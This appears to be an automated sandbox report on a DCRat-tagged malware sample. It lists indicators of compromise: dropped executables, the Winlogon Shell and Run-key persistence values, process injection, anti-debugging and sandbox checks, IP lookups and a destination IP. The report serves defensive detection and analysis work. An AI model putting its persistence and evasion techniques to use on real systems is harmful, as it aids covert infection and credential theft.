dcrat | 15443c40e026f2aed7f025261a8e3a0d25ac8b2160df15f8cf40206c80eca148

Processes:

RFQ2.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe,\"C:\\Users\\Admin\\AppData\\Local\\chrome.ex.exe\","	RFQ2.exe

Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.

Processes:

rundll32.exe

description pid pid_target process target process

Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1180 3548 rundll32.exe
PseudoManuscrypt
PseudoManuscrypt is a malware Lazarus’s Manuscrypt targeting government organizations and ICS.
loader pseudomanuscrypt
Raccoon
Raccoon is an infostealer written in C++ and first seen in 2019.
stealer raccoon
SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar

description	pid	pid_target	process	target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1180	3548	rundll32.exe

DCRat payload 1 IoCs

Detects payload of DCRat, commonly dropped by NSIS installers.

rat

Processes:

resource	yara_rule
behavioral1/memory/4876-678-0x0000000000400000-0x00000000004CE000-memory.dmp	dcrat

Downloads MZ/PE file

.NET Reactor proctector 1 IoCs

Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

Processes:

resource	yara_rule
behavioral1/memory/1452-1149-0x00000200CF080000-0x00000200CF16C000-memory.dmp	net_reactor

Executes dropped EXE 22 IoCs

Processes:

EBZfayui1.exeOlovWPF.exeRFQ2.exeolov.exev40.exestpoeoeiej.exesetup.exestpoeoeiej.exefile.exeis-EQJB1.tmpFRec323.exepowershell.exeSetuр.exestpoeoeiej.exej1SnXvpi0.exeSMSvcHost.exeFvryllwsales.exefb94349c162808651fb84b58e6881eb0.exeCrack.exeaspnet_state.exeDriver Easy Pro Crack..exebuild2.exe

pid	process
1768	EBZfayui1.exe
2056	OlovWPF.exe
4624	RFQ2.exe
964	olov.exe
1752	v40.exe
5080	stpoeoeiej.exe
496	setup.exe
3760	stpoeoeiej.exe
3448	file.exe
1540	is-EQJB1.tmp
3708	FRec323.exe
4512	powershell.exe
812	Setuр.exe
1792	stpoeoeiej.exe
1048	j1SnXvpi0.exe
1732	SMSvcHost.exe
2540	Fvryllwsales.exe
3420	fb94349c162808651fb84b58e6881eb0.exe
3524	Crack.exe
4780	aspnet_state.exe
2808	Driver Easy Pro Crack..exe
4944	build2.exe

Loads dropped DLL 1 IoCs

Processes:

is-EQJB1.tmp

pid process

1540 is-EQJB1.tmp

pid	process
1540	is-EQJB1.tmp

Modifies file permissions 1 TTPs 22 IoCs

discovery

File Permissions Modification

T1222

Processes:

icacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exe

pid	process
4408	icacls.exe
2804	icacls.exe
5176	icacls.exe
5740	icacls.exe
5080	icacls.exe
7416	icacls.exe
4064	icacls.exe
496	icacls.exe
7664	icacls.exe
6644	icacls.exe
7548	icacls.exe
2772	icacls.exe
7124	icacls.exe
5864	icacls.exe
7276	icacls.exe
5340	icacls.exe
5620	icacls.exe
5368	icacls.exe
2804	icacls.exe
6620	icacls.exe
7904	icacls.exe
6156	icacls.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

UPX packed file 6 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\Desktop\New folder\HeInstaller\v40.exe	upx
C:\Users\Admin\Desktop\New folder\HeInstaller\v40.exe	upx
behavioral1/memory/1752-756-0x0000000000160000-0x00000000010C4000-memory.dmp	upx
behavioral1/memory/1752-798-0x0000000000160000-0x00000000010C4000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\nig1r21312312.exe	upx
C:\ProgramData\DesktopWindowsHolographicDevices-type1.9.4.9\DesktopWindowsHolographicDevices-type1.9.4.9.exe	upx

Unexpected DNS network traffic destination 1 IoCs
Network traffic to other servers than the configured DNS servers was detected on the DNS port.

Processes:

description ioc

Destination IP 34.142.181.181
Uses the VBS compiler for execution 1 TTPs

Scripting
T1064
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

description	ioc
Destination IP	34.142.181.181

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

Processes:

chrome.exestpoeoeiej.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000\Software\Microsoft\Windows\CurrentVersion\Run	chrome.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000\Software\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\ff5c3531-a01a-4c50-9c95-ad3eb0ab17e2\\stpoeoeiej.exe\" --AutoStart"	stpoeoeiej.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Looks up external IP address via web service 6 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

136 api.2ip.ua
137 api.2ip.ua
142 api.2ip.ua
186 api.ipify.org
187 api.ipify.org
201 ip-api.com

flow	ioc
136	api.2ip.ua
137	api.2ip.ua
142	api.2ip.ua
186	api.ipify.org
187	api.ipify.org
201	ip-api.com

Maps connected drives based on registry 3 TTPs 2 IoCs

Disk information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

Processes:

v40.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum	v40.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0	v40.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

Setuр.exe

pid process

812 Setuр.exe
812 Setuр.exe

pid	process
812	Setuр.exe
812	Setuр.exe

Suspicious use of SetThreadContext 6 IoCs

Processes:

EBZfayui1.exestpoeoeiej.exepowershell.exeSMSvcHost.exeRFQ2.exeCrack.exe

description	pid	process	target process
PID 1768 set thread context of 4876	1768	EBZfayui1.exe	vbc.exe
PID 5080 set thread context of 3760	5080	stpoeoeiej.exe	stpoeoeiej.exe
PID 4512 set thread context of 1792	4512	powershell.exe	stpoeoeiej.exe
PID 1732 set thread context of 3420	1732	SMSvcHost.exe	fb94349c162808651fb84b58e6881eb0.exe
PID 4624 set thread context of 3032	4624	RFQ2.exe	InstallUtil.exe
PID 3524 set thread context of 4944	3524	Crack.exe	build2.exe

Drops file in Program Files directory 9 IoCs

Processes:

is-EQJB1.tmp

description	ioc	process
File created	C:\Program Files (x86)\FJBsoftFR\FRec323\is-06EPB.tmp	is-EQJB1.tmp
File created	C:\Program Files (x86)\FJBsoftFR\FRec323\is-OBGKC.tmp	is-EQJB1.tmp
File created	C:\Program Files (x86)\FJBsoftFR\FRec323\is-89F6O.tmp	is-EQJB1.tmp
File opened for modification	C:\Program Files (x86)\FJBsoftFR\FRec323\FRec323.exe	is-EQJB1.tmp
File created	C:\Program Files (x86)\FJBsoftFR\FRec323\unins000.dat	is-EQJB1.tmp
File created	C:\Program Files (x86)\FJBsoftFR\FRec323\is-C9NQ4.tmp	is-EQJB1.tmp
File created	C:\Program Files (x86)\FJBsoftFR\FRec323\is-VVSES.tmp	is-EQJB1.tmp
File created	C:\Program Files (x86)\FJBsoftFR\FRec323\data\is-37CKS.tmp	is-EQJB1.tmp
File opened for modification	C:\Program Files (x86)\FJBsoftFR\FRec323\unins000.dat	is-EQJB1.tmp

Drops file in Windows directory 4 IoCs

Processes:

MicrosoftEdge.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exe

description	ioc	process
File created	C:\Windows\rescache\_merged\3720402701\2219095117.pri	MicrosoftEdge.exe
File opened for modification	C:\Windows\Debug\ESE.TXT	MicrosoftEdge.exe
File created	C:\Windows\rescache\_merged\3720402701\2219095117.pri	MicrosoftEdgeCP.exe
File created	C:\Windows\rescache\_merged\3720402701\2219095117.pri	MicrosoftEdgeCP.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 12 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
4364	5364	WerFault.exe	lower.exe
3988	5364	WerFault.exe	lower.exe
4496	3812	WerFault.exe	7896aff6884e71e105ced68d188c31f5303bc118de29596f1409c61d0b5f5196.exe
6832	5204	WerFault.exe	7896aff6884e71e105ced68d188c31f5303bc118de29596f1409c61d0b5f5196.exe
6436	5364	WerFault.exe	lower.exe
7228	5400	WerFault.exe	7896aff6884e71e105ced68d188c31f5303bc118de29596f1409c61d0b5f5196.exe
8088	5364	WerFault.exe	lower.exe
7984	5364	WerFault.exe	lower.exe
6560	5364	WerFault.exe	lower.exe
7952	5364	WerFault.exe	lower.exe
3480	5364	WerFault.exe	lower.exe
1560	5364	WerFault.exe	lower.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

Processes:

fb94349c162808651fb84b58e6881eb0.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	fb94349c162808651fb84b58e6881eb0.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	fb94349c162808651fb84b58e6881eb0.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	fb94349c162808651fb84b58e6881eb0.exe

Creates scheduled task(s) 1 TTPs 9 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid	process
3900	schtasks.exe
3220	schtasks.exe
2864	schtasks.exe
1180	schtasks.exe
5332	schtasks.exe
5868	schtasks.exe
7344	schtasks.exe
5856	schtasks.exe
6360	schtasks.exe

Delays execution with timeout.exe 2 IoCs
evasion

Processes:

timeout.exetimeout.exe

pid process

5724 timeout.exe
5856 timeout.exe

pid	process
5724	timeout.exe
5856	timeout.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

System Information Discovery

Processes:

chrome.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe

Kills process with taskkill 2 IoCs
evasion

Processes:

taskkill.exetaskkill.exe

pid process

5912 taskkill.exe
5536 taskkill.exe

pid	process
5912	taskkill.exe
5536	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 4 IoCs

adware spyware

Modify Registry

Processes:

MicrosoftEdgeCP.exeMicrosoftEdge.exebrowser_broker.exeMicrosoftEdgeCP.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000\Software\Microsoft\Internet Explorer\Main	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000\Software\Microsoft\Internet Explorer\Main	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000\Software\Microsoft\Internet Explorer\Main	browser_broker.exe
Key created	\REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000\Software\Microsoft\Internet Explorer\Main	MicrosoftEdgeCP.exe

Modifies data under HKEY_USERS 2 IoCs

Processes:

chrome.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133240852014175478"	chrome.exe

Modifies registry class 64 IoCs

Processes:

MicrosoftEdgeCP.exeMicrosoftEdge.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exe

description	ioc	process
Set value (int)	\REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\002\Internet Explorer\DOMStorage\msn.com\ = "0"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\002\Internet Settings\Cache\Content\CachePrefix	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 8a4b40f0d95dd901	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\002\CIStatus\CIPolicyState = "0"	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DataStore\LastCleanup = 4a981df6d95dd901	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\TypedUrlsComplete = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\InternetRegistry	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VersionLow = "0"	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\002\Internet Settings\Cache\History\CachePrefix = "Visited:"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TabbedBrowsing\NTPFirstRun = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\ChromeMigration	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus\CIPolicyState = "0"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 20c3d5f0d95dd901	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\002\Internet Explorer\DOMStorage\Total\ = "46"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\002\Internet Explorer\DomStorageState\EdpCleanupState = "0"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\002\Internet Explorer\EdpDomStorage\www.msn.com	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus\DynamicCodePolicy = 05000000	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FirstRun\LastBuildInstalled = 1c0100000a00000000000000d73a00000200000000000000000000000000000000000000fc52000080a6899efe7f000048d35fe6200000000000000000000000a3fecb68c36400005219039efe7f0000000000000000000066000000000000000000000000000000388adfaf57010000000000000000000090d35fe6200000000000000000000000000000000000000000d45fe6200000002862ef82fe7f00006600000000000000388adfaf5701000000000000000000000100000000000000000000000000000000000000000000000100000000000000e97a0383fe7f000000000000000000000000000000000000000000005701000030b91eb0570100000000000000000000eb52f982fe7f0000000000000000000000010100	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\Favorites	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ReadingMode\SettingsVersion = "2"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-DXFeatureLevel = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\002\Internet Settings\Cache\Extensible Cache	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\002\Internet Explorer\EdpDomStorage\Total	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\IE10TourShown = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\002\Internet Explorer\EdpDomStorage	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus\DynamicCodePolicy = 05000000	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\OnlineHistory\NextBrowserDataLogTime = a03549550c5ed901	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ServiceUI	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3\{AEBA21FA-782A-4A90-978D-B7216 = 1a3761592352350c7a5f20172f1e1a190e2b017313371312141a152a	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionLow = "395205405"	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies\CacheLimit = "1"	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\002\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\002\Internet Explorer\EdpDomStorage\msn.com\Total = "0"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\002\Internet Explorer\Main	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url2 = "https://login.aliexpress.com/"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\PrivacyAdvanced = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\002\Internet Settings\Cache\Content	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CachePrefix	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url5 = "https://twitter.com/"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\ReadingStorePending = "0"	MicrosoftEdge.exe
